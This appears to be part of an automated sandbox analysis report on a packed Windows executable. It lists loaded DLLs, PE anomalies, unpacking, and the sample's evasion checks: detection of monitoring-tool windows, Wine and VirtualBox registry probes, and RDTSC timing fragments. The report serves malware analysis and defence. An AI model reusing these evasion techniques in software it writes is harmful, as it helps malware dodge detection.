Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Ebgl8jb6CW.exe

Static file information: File size 1820672 > 1048576

Source: Ebgl8jb6CW.exe

Static PE information: Raw size of umgaveln is bigger than: 0x100000 < 0x192800

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe

Unpacked PE file: 0.2.Ebgl8jb6CW.exe.170000.0.unpack :EW;.rsrc:W;.idata :W; :EW;umgaveln:EW;bjptkchu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;umgaveln:EW;bjptkchu:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: Ebgl8jb6CW.exe

Static PE information: real checksum: 0x1c826d should be: 0x1c9e29

Source: Ebgl8jb6CW.exe	Static PE information: section name:
Source: Ebgl8jb6CW.exe	Static PE information: section name: .idata
Source: Ebgl8jb6CW.exe	Static PE information: section name:
Source: Ebgl8jb6CW.exe	Static PE information: section name: umgaveln
Source: Ebgl8jb6CW.exe	Static PE information: section name: bjptkchu
Source: Ebgl8jb6CW.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001C91E9 push 67A8CE00h; mov dword ptr [esp], edi	0_2_001CA5A3
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00428047 push ecx; mov dword ptr [esp], eax	0_2_0042807B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001CE02A push ebp; mov dword ptr [esp], esp	0_2_001CE040
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00412079 push 30579AE6h; mov dword ptr [esp], edi	0_2_00412100
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_00412079 push ecx; mov dword ptr [esp], ebp	0_2_0041212B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001C7042 push ebx; mov dword ptr [esp], esi	0_2_001C7389
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001A7069 push es; retf	0_2_001A7074
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0044D031 push ecx; mov dword ptr [esp], edi	0_2_0044D0A7
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0044D031 push eax; mov dword ptr [esp], esi	0_2_0044D113
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0044D031 push edx; mov dword ptr [esp], edi	0_2_0044D181
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001C709D push ebp; mov dword ptr [esp], edi	0_2_001C70B4
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_004220C4 push 67776C03h; mov dword ptr [esp], edi	0_2_00422166
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_004220C4 push edi; mov dword ptr [esp], 1F6C2434h	0_2_004221AD
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_004220C4 push 1C066046h; mov dword ptr [esp], ebx	0_2_004221BF
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_004220C4 push 00A82517h; mov dword ptr [esp], ebx	0_2_0042221B
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001CC09A push 6062A897h; mov dword ptr [esp], ebx	0_2_001CC0AA
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022E0AB push eax; mov dword ptr [esp], 00000004h	0_2_0022E5DC
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022E0AB push ebx; mov dword ptr [esp], esi	0_2_0022E604
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022E0AB push 590B6881h; mov dword ptr [esp], esi	0_2_0022E611
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022E0AB push 482903A8h; mov dword ptr [esp], esi	0_2_0022E61D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022E0AB push esi; mov dword ptr [esp], ebx	0_2_0022E6C9
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022E0AB push ebx; mov dword ptr [esp], 19AA7290h	0_2_0022E6FA
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022E0AB push esi; mov dword ptr [esp], edx	0_2_0022E73D
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_0022E0AB push edi; mov dword ptr [esp], 4FFF9001h	0_2_0022E76A
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_003EF0AB push 26F122ADh; mov dword ptr [esp], edx	0_2_003EF3FA
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_003E70A7 push 5FCA9108h; mov dword ptr [esp], eax	0_2_003E7751
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001CE087 push ecx; mov dword ptr [esp], 41D8A23Fh	0_2_001CE090
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EB085 push 50E04621h; mov dword ptr [esp], eax	0_2_001EB5B6
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EB085 push 04C1827Bh; mov dword ptr [esp], esi	0_2_001EB667
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EB085 push eax; mov dword ptr [esp], edx	0_2_001EB692
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Code function: 0_2_001EB085 push 7274AF1Eh; mov dword ptr [esp], esi	0_2_001EB6A3

Source: Ebgl8jb6CW.exe	Static PE information: section name: entropy: 7.980179481520325
Source: Ebgl8jb6CW.exe	Static PE information: section name: umgaveln entropy: 7.9539106150205106

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 32FFAA second address: 32FFB4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCA7480D346h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 342CCE second address: 342CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 342F67 second address: 342F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 342F6B second address: 342F75 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCA74808076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 342F75 second address: 342F7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3430F3 second address: 343105 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jng 00007FCA74808076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 343105 second address: 34310B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 34310B second address: 343124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FCA74808084h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 343124 second address: 34312C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 34312C second address: 343130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 34329F second address: 3432A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 344D58 second address: 344DEB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 00350C00h 0x0000000f jmp 00007FCA74808085h 0x00000014 mov di, 0A5Ch 0x00000018 push 00000003h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007FCA74808078h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 and ch, 00000040h 0x00000037 push 00000000h 0x00000039 mov dword ptr [ebp+122D2327h], edx 0x0000003f push 00000003h 0x00000041 push edi 0x00000042 adc edx, 600AC8B8h 0x00000048 pop esi 0x00000049 push E8C7231Ah 0x0000004e push edx 0x0000004f jmp 00007FCA7480807Fh 0x00000054 pop edx 0x00000055 xor dword ptr [esp], 28C7231Ah 0x0000005c mov dword ptr [ebp+122D19AAh], eax 0x00000062 lea ebx, dword ptr [ebp+1244FC1Eh] 0x00000068 mov dword ptr [ebp+122D33FFh], esi 0x0000006e xchg eax, ebx 0x0000006f pushad 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 344DEB second address: 344DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 344EFF second address: 344F5A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007FCA74808084h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FCA74808085h 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007FCA74808086h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 js 00007FCA74808076h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 344F5A second address: 344FD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 js 00007FCA7480D346h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop eax 0x00000010 mov si, 2D9Ah 0x00000014 mov dh, 56h 0x00000016 push 00000003h 0x00000018 or dword ptr [ebp+122D1C31h], ecx 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007FCA7480D348h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 0000001Dh 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a jnc 00007FCA7480D34Bh 0x00000040 pushad 0x00000041 mov ecx, 381E1BDCh 0x00000046 jp 00007FCA7480D34Ch 0x0000004c mov dword ptr [ebp+122D33CDh], eax 0x00000052 popad 0x00000053 push 00000003h 0x00000055 mov dword ptr [ebp+122D3409h], ecx 0x0000005b call 00007FCA7480D349h 0x00000060 push esi 0x00000061 pushad 0x00000062 push ebx 0x00000063 pop ebx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 344FD4 second address: 344FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 jl 00007FCA74808084h 0x0000000d pushad 0x0000000e ja 00007FCA74808076h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 344FEA second address: 345042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 je 00007FCA7480D350h 0x0000000f jmp 00007FCA7480D34Ah 0x00000014 mov eax, dword ptr [eax] 0x00000016 jng 00007FCA7480D34Ah 0x0000001c push edi 0x0000001d push edx 0x0000001e pop edx 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push edx 0x00000025 jmp 00007FCA7480D34Eh 0x0000002a pop edx 0x0000002b pop eax 0x0000002c adc edi, 41DE09F2h 0x00000032 mov cl, 1Ch 0x00000034 lea ebx, dword ptr [ebp+1244FC27h] 0x0000003a xor dl, FFFFFF84h 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 jo 00007FCA7480D346h 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3450FF second address: 345186 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 3BE25DE7h 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FCA74808078h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 or dword ptr [ebp+122D1C27h], ecx 0x0000002e push 00000003h 0x00000030 movsx ecx, bx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007FCA74808078h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f mov di, cx 0x00000052 push 00000003h 0x00000054 mov ch, A2h 0x00000056 call 00007FCA74808079h 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e jmp 00007FCA7480807Fh 0x00000063 pushad 0x00000064 popad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 345186 second address: 3451AD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnl 00007FCA7480D355h 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FCA7480D346h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3451AD second address: 3451E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007FCA74808088h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007FCA7480807Ch 0x0000001a ja 00007FCA74808076h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 365677 second address: 365689 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA7480D34Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 365689 second address: 36568D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 36568D second address: 3656AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FCA7480D346h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCA7480D351h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3656AE second address: 3656B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3656B4 second address: 3656B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3656B8 second address: 3656E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA74808083h 0x00000007 jmp 00007FCA74808081h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 36389F second address: 3638B3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FCA7480D346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FCA7480D346h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 363F68 second address: 363F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA7480807Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 363F7B second address: 363F81 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 363F81 second address: 363F86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 364275 second address: 364290 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FCA7480D351h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 364290 second address: 364296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 364296 second address: 3642BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCA7480D351h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jmp 00007FCA7480D34Bh 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 36453A second address: 364540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 364680 second address: 364688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 325E50 second address: 325E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 325E55 second address: 325E5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 364F84 second address: 364F88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 365236 second address: 36524A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA7480D350h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 36524A second address: 36524E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 36524E second address: 36525C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FCA7480D34Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 365541 second address: 365545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 367969 second address: 367987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FCA7480D356h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 367987 second address: 36798C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 36798C second address: 367994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 367994 second address: 3679AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FCA74808080h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 333656 second address: 33366C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCA7480D346h 0x0000000a jnp 00007FCA7480D346h 0x00000010 popad 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 36A73A second address: 36A74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCA7480807Bh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 36A74D second address: 36A757 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCA7480D34Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 36ADF5 second address: 36AE0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA74808085h 0x00000009 rdtsc
